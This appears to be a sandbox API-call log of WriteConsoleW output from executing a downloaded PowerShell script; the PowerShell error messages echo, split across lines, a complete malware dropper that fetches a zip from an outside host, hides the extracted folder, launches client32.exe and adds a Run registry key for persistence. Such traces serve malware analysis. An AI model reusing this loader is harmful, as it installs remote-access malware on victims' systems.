|
WriteConsoleW
|
buffer:
The term '<' is not recognized as the name of a cmdlet, function, script file,
console_handle:
0x00000023
|
1
|
1 |
0
|
|
WriteConsoleW
|
buffer:
or operable program. Check the spelling of the name, or if a path was included,
console_handle:
0x0000002f
|
1
|
1 |
0
|
|
WriteConsoleW
|
buffer:
verify that the path is correct and try again.
console_handle:
0x0000003b
|
1
|
1 |
0
|
|
WriteConsoleW
|
buffer:
At C:\Users\test22\AppData\Local\Temp\snappyshop.it_img_docse.php.ps1:2 char:2
console_handle:
0x00000047
|
1
|
1 |
0
|
|
WriteConsoleW
|
buffer:
+ < <<<< !-- saved from url=(0039)https://www.snappyshop.it/img/docse.php -->
console_handle:
0x00000053
|
1
|
1 |
0
|
|
WriteConsoleW
|
buffer:
+ CategoryInfo : ObjectNotFound: (<:String) [], CommandNotFoundEx
console_handle:
0x0000005f
|
1
|
1 |
0
|
|
WriteConsoleW
|
buffer:
ception
console_handle:
0x0000006b
|
1
|
1 |
0
|
|
WriteConsoleW
|
buffer:
+ FullyQualifiedErrorId : CommandNotFoundException
console_handle:
0x00000077
|
1
|
1 |
0
|
|
WriteConsoleW
|
buffer:
The term '<' is not recognized as the name of a cmdlet, function, script file,
console_handle:
0x00000097
|
1
|
1 |
0
|
|
WriteConsoleW
|
buffer:
or operable program. Check the spelling of the name, or if a path was included,
console_handle:
0x000000a3
|
1
|
1 |
0
|
|
WriteConsoleW
|
buffer:
verify that the path is correct and try again.
console_handle:
0x000000af
|
1
|
1 |
0
|
|
WriteConsoleW
|
buffer:
At C:\Users\test22\AppData\Local\Temp\snappyshop.it_img_docse.php.ps1:3 char:2
console_handle:
0x000000bb
|
1
|
1 |
0
|
|
WriteConsoleW
|
buffer:
+ < <<<< html><head><meta http-equiv="Content-Type" content="text/html; charset
console_handle:
0x000000c7
|
1
|
1 |
0
|
|
WriteConsoleW
|
buffer:
=UTF-8"></head><body>cd $env:AppData; $linok='https://www.snappyshop.it/img/ind
console_handle:
0x000000d3
|
1
|
1 |
0
|
|
WriteConsoleW
|
buffer:
ex.php'; $rnums=Get-Random -minimum 5 -maximum 9; $r_rnum=Get-Random -minimum 1
console_handle:
0x000000df
|
1
|
1 |
0
|
|
WriteConsoleW
|
buffer:
051 -maximum 8989; $chrs='abcdefgjklmntuvwxyzABCDEFGHILMNOTUWXYZ1256890'; $r_st
console_handle:
0x000000eb
|
1
|
1 |
0
|
|
WriteConsoleW
|
buffer:
rng=''; $ran=New-Object System.Random; for ($i=0; $i -lt $rnums; $i++) {$r_strn
console_handle:
0x000000f7
|
1
|
1 |
0
|
|
WriteConsoleW
|
buffer:
g+=$chrs[$ran.next(0, $chrs.Length)]}; $rzip=$r_strng+'.zip'; $path=$env:APPDAT
console_handle:
0x00000103
|
1
|
1 |
0
|
|
WriteConsoleW
|
buffer:
A+'\'+$rzip; $pezip_=$env:APPDATA+'\ClockUTCSync_'+$r_rnum; Start-BitsTransfer
console_handle:
0x0000010f
|
1
|
1 |
0
|
|
WriteConsoleW
|
buffer:
-Source $linok -Destination $Path; expand-archive -path $path -destinationpath
console_handle:
0x0000011b
|
1
|
1 |
0
|
|
WriteConsoleW
|
buffer:
$pezip_; $FOLD=Get-Item $pezip_ -Force; $FOLD.attributes='Hidden'; Remove-Item
console_handle:
0x00000127
|
1
|
1 |
0
|
|
WriteConsoleW
|
buffer:
-path $path; cd $pezip_; start client32.exe; $fstrng=$pezip_+'\client32.exe'; $
console_handle:
0x00000133
|
1
|
1 |
0
|
|
WriteConsoleW
|
buffer:
ranome='ClockUTCSync_'+$r_rnum; New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsof
console_handle:
0x0000013f
|
1
|
1 |
0
|
|
WriteConsoleW
|
buffer:
t\Windows\CurrentVersion\Run' -Name $ranome -Value $fstrng -PropertyType 'Stri
console_handle:
0x0000014b
|
1
|
1 |
0
|
|
WriteConsoleW
|
buffer:
ng'; #rg-1iGqMCFs5us0h8x6K-y-KXA3p3Mc7X12TI*h_KecQ1s+22HKqPCrSq)9jyY#Etcjn!rjvC
console_handle:
0x00000157
|
1
|
1 |
0
|
|
WriteConsoleW
|
buffer:
J+ER&qwDD8&$5k3o3(+iPr)V1Imtqvc!jjjcipXEjMM+0ldSV0l&1+XN_1f_YZbtD4h
console_handle:
0x00000163
|
1
|
1 |
0
|
|
WriteConsoleW
|
buffer:
7lU9X_K!ND@41=DzbNPKhwHbi_VOF1XdKhtmH^Ol@NnBrXH0azon@6IvpLgtaVs(vh(p1E3XhV)3dOY
console_handle:
0x0000016f
|
1
|
1 |
0
|
|
WriteConsoleW
|
buffer:
h8!(1xC6oalkP-=j(NnlUGEq39PHiLkG&0COazD6a^%ie*qFoV%QUyFbvs(#RJLe)K5Cvq*%qDd
console_handle:
0x0000017b
|
1
|
1 |
0
|
|
WriteConsoleW
|
buffer:
48l%)hFi8ETTj8ofvh0ZQn6@zj!K-KO2$6Wy04v9R9DXP23IUEc&v!R-3qTv3o(Zof6uA-@vT05
console_handle:
0x00000187
|
1
|
1 |
0
|
|
WriteConsoleW
|
buffer:
J#V9gZ_FJ(E76(3$FsZs8no^HY&TKz(VQ8dWC(CzgIzX%8!e#vpRk)9v8&xo0MTMSKCAxqQ
console_handle:
0x00000193
|
1
|
1 |
0
|
|
WriteConsoleW
|
buffer:
%v6=xCKL(4sF$s3=LOz1YdqwXy2oS=pEKZ^xgvGvlCke5uXKmq0VThkVd#^p*NRk@v@4S+WPIAXfv)B
console_handle:
0x0000019f
|
1
|
1 |
0
|
|
WriteConsoleW
|
buffer:
RPeRqeTg9U1vyt^fQsJ$lJAbr@w8Xlot3l=88+bW&o$IA8TBEQ0FM*hTcQWaNOAe396#^o@(Qnn
console_handle:
0x000001ab
|
1
|
1 |
0
|
|
WriteConsoleW
|
buffer:
avoX8%qsT-JD#imhVZ5^A0%=#Dx-@nr!Y2GpmE4-w_6$FUPPV@EBE@Kpq2Mt^HRL1mxBxaIdlF!9Nal
console_handle:
0x000001b7
|
1
|
1 |
0
|
|
WriteConsoleW
|
buffer:
QX1Tsd!g*bm%scIa-BfjgGR-@DG2B%&wJnY28p*Kli%0n-m=^zT)oFR*PheX_ndm3JiMfZaK4*e
console_handle:
0x000001c3
|
1
|
1 |
0
|
|
WriteConsoleW
|
buffer:
!StP@IkTC07!5Xky^OT5TFAOzPgvRtd9NTpUa%eLWR#oU5MHt#GTcvpVLaGmxK!FM+%)2b*phNPwBOw
console_handle:
0x000001cf
|
1
|
1 |
0
|
|
WriteConsoleW
|
buffer:
C7kybZL53y1$MC8otJN@QTyx-xwKqXgVhdb!3zzLe%^$3xSpwf9itj3kiK!9acfLO#*eV1#9g0KS!SW
console_handle:
0x000001db
|
1
|
1 |
0
|
|
WriteConsoleW
|
buffer:
0W2@tf3I)YczQS-4z*y1H$jTZ_$iv5Q8*LbNXhXQYT1vAsyXTHh0B7+FdQjYOZZW&bxT)IOKZ31
console_handle:
0x000001e7
|
1
|
1 |
0
|
|
WriteConsoleW
|
buffer:
Gz$(NKj8Dyhbr_(kF=(FLptjZs)bwExvjQcid+ryOPChd(ioM4(x4zoOhCY_G$$@32!V_3d%1$i7nuO
console_handle:
0x000001f3
|
1
|
1 |
0
|
|
WriteConsoleW
|
buffer:
WevQOMz=oH$DX(b!F+JMUI3luo5+WlYWVce-&Z8Q6)2IPYq8G4GHgH#V(bu+p%6j-T2oo6tGsDw
console_handle:
0x000001ff
|
1
|
1 |
0
|
|
WriteConsoleW
|
buffer:
#(jgyCRSm+i#$rXVzSju1Y=fapFrm8ybP%SI_!5oyxZ_lG(Bn)ulK#j3mSA(zjl46hUj(ZdBSuT6y)K
console_handle:
0x0000020b
|
1
|
1 |
0
|
|
WriteConsoleW
|
buffer:
LCc_$6O3+9@0It=K@N9JumijxP%SouH3qlVr=nPCh$it*V^VEYo_sQRZq9z1vjV0AEoSsznnejYuXt^
console_handle:
0x00000217
|
1
|
1 |
0
|
|
WriteConsoleW
|
buffer:
nTe9os%nj0Hsrvl4ssu+5)+r_0T04agmP&Kvo*UipWiUV&X4yFc*%fYzNwcw+QaIFGqglt&
console_handle:
0x00000223
|
1
|
1 |
0
|
|
WriteConsoleW
|
buffer:
amp;NeeqWv(w*vH%2+QXPt=tSf*Q=umwDa2u$)W+JKNjyrxCd!Hlo)8fX$foCTrFvF$4-)G)MnmO49<
console_handle:
0x0000022f
|
1
|
1 |
0
|
|
WriteConsoleW
|
buffer:
/body></html>
console_handle:
0x0000023b
|
1
|
1 |
0
|
|
WriteConsoleW
|
buffer:
+ CategoryInfo : ObjectNotFound: (<:String) [], CommandNotFoundEx
console_handle:
0x00000247
|
1
|
1 |
0
|
|
WriteConsoleW
|
buffer:
ception
console_handle:
0x00000253
|
1
|
1 |
0
|
|
WriteConsoleW
|
buffer:
+ FullyQualifiedErrorId : CommandNotFoundException
console_handle:
0x0000025f
|
1
|
1 |
0
|
|
WriteConsoleW
|
buffer:
The term 'Start-BitsTransfer' is not recognized as the name of a cmdlet, functi
console_handle:
0x0000027f
|
1
|
1 |
0
|
|
WriteConsoleW
|
buffer:
on, script file, or operable program. Check the spelling of the name, or if a p
console_handle:
0x0000028b
|
1
|
1 |
0
|
|
WriteConsoleW
|
buffer:
ath was included, verify that the path is correct and try again.
console_handle:
0x00000297
|
1
|
1 |
0
|
snappyshop.it_img_docse.php.ps1